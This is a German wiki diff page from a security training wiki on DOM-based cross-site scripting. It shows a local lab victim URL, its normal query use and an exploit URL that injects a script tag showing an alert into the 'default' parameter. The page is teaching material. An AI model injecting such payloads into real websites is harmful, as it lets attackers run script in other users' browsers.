Cross-Site-Scripting "DOM-basiertes" Beispiele: Unterschied zwischen den Versionen

Aus Xinux Wiki
Zur Navigation springen Zur Suche springen
Zeile 8: Zeile 8:
  
 
* http://opfer.secure.local/scripts/xss-dom.html
 
* http://opfer.secure.local/scripts/xss-dom.html
 +
 +
[[Bild:dom-xss-1.png]]
  
 
== Normale Verhaltensweise ==
 
== Normale Verhaltensweise ==
Zeile 14: Zeile 16:
 
* http://opfer.secure.local/scripts/xss-dom.html?default=Bitte%20auf%20dieser%20Seite%20JavaScript%20ausschalten
 
* http://opfer.secure.local/scripts/xss-dom.html?default=Bitte%20auf%20dieser%20Seite%20JavaScript%20ausschalten
  
[[Bild:
+
[[Bild:dom-xss-2.png]]
  
 
== Exploit über die URL ==
 
== Exploit über die URL ==
  
* http://opfer.secure.local/scripts/xss-dom.html?default=%3Cscript%3Ealert(%22Hacked%20by%20Xinux%22)%3C/script%3E
+
* http://opfer.secure.local/scripts/xss-dom.html?default=<script>alert("Hacked by Xinux")</script>
 +
 
 +
[[Bild:dom-xss-3.png]]

Version vom 7. März 2023, 11:35 Uhr

Cross-Site-Scripting “Reflected”

Um was geht es?

Link

Dom-xss-1.png

Normale Verhaltensweise

Dom-xss-2.png

Exploit über die URL

Dom-xss-3.png